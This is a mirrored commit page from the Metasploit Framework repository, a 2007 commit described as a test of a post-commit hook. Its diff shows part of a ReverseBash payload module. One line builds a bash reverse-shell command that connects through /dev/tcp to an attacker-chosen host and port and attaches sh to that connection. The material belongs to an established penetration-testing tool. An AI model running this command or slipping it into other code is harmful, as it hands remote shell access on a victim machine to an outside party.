1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00

fixes #4. This is just a test of the post-commit hook

git-svn-id: file:///home/svn/framework3/trunk@4408 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2007-02-17 23:44:05 +00:00
parent ce01a25e0c
commit 854607771c

View File

@ -46,7 +46,6 @@ module ReverseBash
fd = rand(200) + 20
return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
end
end
end end end end end